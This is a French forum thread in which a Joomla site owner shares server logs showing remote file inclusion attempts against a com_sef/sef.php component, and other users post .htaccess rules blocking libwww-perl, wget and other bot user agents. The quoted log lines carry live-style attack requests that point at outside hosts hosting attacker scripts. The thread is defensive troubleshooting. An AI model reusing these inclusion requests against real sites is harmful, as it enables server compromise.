HELP! blocage de site Web par OVH:libwww-perl

wadzaloo · 10 Décembre 2007

Bonsoir !

Je suis sur Joomla 1.0.12 en mutualisé OVH90 plan

Mon site web est pour la 2eme fois en 3 jours par OVH pour la raison suivante:
Problème rencontré : Hidden PERL script
Commande apparente : init_4
Exécutable utilisé : /usr/bin/perl

Je pense qu'ils ont bien raison, ça sent pas bon ! voici le bout de log que j'ai recupéré aujourd'hui:

Code:

ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:51 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:54 +0100] "GET /bric-a-brac/section// HTTP/1.1" 404 40352 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:55 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 200 76 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:16 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/xt.gif? HTTP/1.1" 200 174 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:17 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 342 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 315 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:59 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"

Malheureusement, mes compétences s'arretent la car je ne sais pas quoi faire contre cette attaque...
Le fichier sef.php est il faillible ? (j'utilise SEFAdvance )

Merci d'avance !

padawan2 · 10 Décembre 2007

Quelle version de SEFAdvance utilises tu ?

Peut être est-ce une ancienne version où il y a un trou de sécurité...
Ensuite, vu que c'est un module commercial, tu devrais peut être te tourner vers leur support.

rog · 10 Décembre 2007

rien dans les logs n'indique que tu as été hacké

ces logs indiquent que ton site fait l'objet d'une attaque, rien de plus ni de hidden

rog

wadzaloo · 10 Décembre 2007

padawan2 a dit:
Quelle version de SEFAdvance utilises tu ?

Peut être est-ce une ancienne version où il y a un trou de sécurité...
Ensuite, vu que c'est un module commercial, tu devrais peut être te tourner vers leur support.

J'tilise la derniere version. Demande envoyée vers le support itou.
Comme je suis une quiche, vous me confirmez que ce qu'on voit sur le log est du a une faille de securité par le sef ?

Sinon, j'avais trouvé sur le forum un pb equivalent avec SPIP je crois mais je n'ai aucune idée de la façon dont regler le probleme. Evidemment sur les 2 attaques, l'IP d'origine ne permet de remonter aucune piste...

Merci pour votre aide

techron · 10 Décembre 2007

@ wadzaloo

C'est un bot malveillant https://www.webrankinfo.com/forum/t/libwww-perl-5-69-quelle-est-ce-bot-de-hacker.64945/

Que fait ce bot ?
En changeant constammment de IP, il scanne les sites web et détecte les failles dans les scripts php, asp, et perl selon le contenu du fichier txt. Les hackers sont d'origine russes.

Protection:
Comme le IP change constanmment, la meilleure protection est un fichier htaccess placé à la racine du site.

Comment ?

Code:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Le robot est redirigé vers lui-même.

wadzaloo · 10 Décembre 2007

Ooops, j'ai lu le topic, ça fout les jetons 8O

En tout cas, merci beaucoup :wink: je viens de modifier le htacess avec ton code et je poste de mon coté sur SEF Advance pour savoir s'il y a une faille

techron · 10 Décembre 2007

Je ne t'ai que partiellement aidé. Cela fait un bon bout de temps que je suis ces salauds à la trace via mes logs de mes sites. Ils peuvent aussi utiliser la librairie python.urllib pour détecter les failles.

A rajouter dans ton htaccess.

Edit:
Tant qu'a y être, ajoute aussi wget

/forum/forumdisplay.php?f=http://ninaru.hut2.ru/images/cs.txt?
Http Code: 403 Date: Dec 10 16:02:39 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

wadzaloo · 11 Décembre 2007

Re-merci pour le tuyau

J'espere que tu nous informeras si tu as du nouveau! (idem de mon coté)

quid · 11 Décembre 2007

Le shackers sont quand même pas assez nuls pour ne pas changer le referer ?

techron · 11 Décembre 2007

@ wadzaloo
Le code donné plus haut va bloquer toutes les versions de libwww. Il est efficace.

Depuis quelques semaines, j'utilise plutôt une version du code suivant. Il englobe tous les useragents cités plus haut et d'autres non-cités. Personnalise-le comme il te convient en tenant compte de cette note:
Warning. This example includes a list of HTTP_USER_AGENTs that are used by known site copy programs..

La compilation des useragents n'est pas mienne. Voici donc la source:
http://www.levrah.net/support.mv?resw=8 ... aq_hosting

Code:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} anon [NC,OR]
RewriteCond %{HTTP_USER_AGENT} asptear [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bandit [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cache [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cj.spider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} collect [NC,OR]
RewriteCond %{HTTP_USER_AGENT} combine [NC,OR]
RewriteCond %{HTTP_USER_AGENT} control [NC,OR]
RewriteCond %{HTTP_USER_AGENT} contrpl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} contype [NC,OR]
RewriteCond %{HTTP_USER_AGENT} copier [NC,OR]
RewriteCond %{HTTP_USER_AGENT} copy [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dnload [NC,OR]
RewriteCond %{HTTP_USER_AGENT} download [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dsns [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dts.agent [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ecatch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} email [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fetch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} filehound [NC,OR]
RewriteCond %{HTTP_USER_AGENT} flashget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} frontpage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ftp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fuck [NC,OR]
RewriteCond %{HTTP_USER_AGENT} getright [NC,OR]
RewriteCond %{HTTP_USER_AGENT} getter [NC,OR]
RewriteCond %{HTTP_USER_AGENT} go.zilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} go.ahead.got.it [NC,OR]
RewriteCond %{HTTP_USER_AGENT} grab [NC,OR]
RewriteCond %{HTTP_USER_AGENT} grub.client [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httpget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hyperspin [NC,OR]
RewriteCond %{HTTP_USER_AGENT} installshield.digitalwizard [NC,OR]
RewriteCond %{HTTP_USER_AGENT} internetseer [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jobo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} konqueror [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leech [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mailto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mister.pix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moozilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} netants [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} offline [NC,OR]
RewriteCond %{HTTP_USER_AGENT} oliverperry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pavuk [NC,OR]
RewriteCond %{HTTP_USER_AGENT} picture [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pingalink [NC,OR]
RewriteCond %{HTTP_USER_AGENT} publish [NC,OR]
RewriteCond %{HTTP_USER_AGENT} python.urllib [NC,OR]
RewriteCond %{HTTP_USER_AGENT} registry.verify [NC,OR]
RewriteCond %{HTTP_USER_AGENT} scan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} snag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} softwing [NC,OR]
RewriteCond %{HTTP_USER_AGENT} strip [NC,OR]
RewriteCond %{HTTP_USER_AGENT} stamina [NC,OR]
RewriteCond %{HTTP_USER_AGENT} surveybot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teleport [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t.h.u.n.d.e.r.s.t.o.n.e [NC,OR]
RewriteCond %{HTTP_USER_AGENT} turnitinbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} udmsearch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webcollage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webfilter.robot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webinator [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webreaper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webwasher [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wildsoft [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wwwoffle [NC,OR]
RewriteCond %{HTTP_USER_AGENT} zip [NC]
RewriteRule ^.* - [F]

<Files 403.shtml>
order allow,deny
allow from all
</Files>

wadzaloo · 11 Décembre 2007

bravo pour ce travail (j'ai mis une étoile pour recommander ce post)

:wink:

wadzaloo · 15 Décembre 2007

Bonjour

Re Zut...site bloqué de nouveau

Voici le log mais je ne sais pas de quelle lib il s'agit (a priori pas dans la liste ci-dessus)

Code:

189.1.161.34 www.legrattonaute.com - [15/Dec/2007:08:04:48 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://qlzrox.iespana.es/sb4? HTTP/1.1" 500 610 "-" "Mozilla/3.0 (compatible; Indy Library)"

Et faille de sécurité toujours pas trouvée...

wadzaloo · 15 Décembre 2007

Bon, pour le moment, j'ai ajouté ça dans htacess (trouvé sur un forum US)

Code:

SetEnvIf User-Agent ^Mozilla.*indy keep_out
order allow,deny
allow from all
deny from env=keep_out

Je sais pas si c'est bon

rog · 15 Décembre 2007

189.1.161.34 www.legrattonaute.com - [15/Dec/2007:08:04:48 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://qlzrox.iespana.es/sb4? HTTP/1.1" 500 610 "-" "Mozilla/3.0 (compatible; Indy Library)"

quand même bizarre ton histoire

rog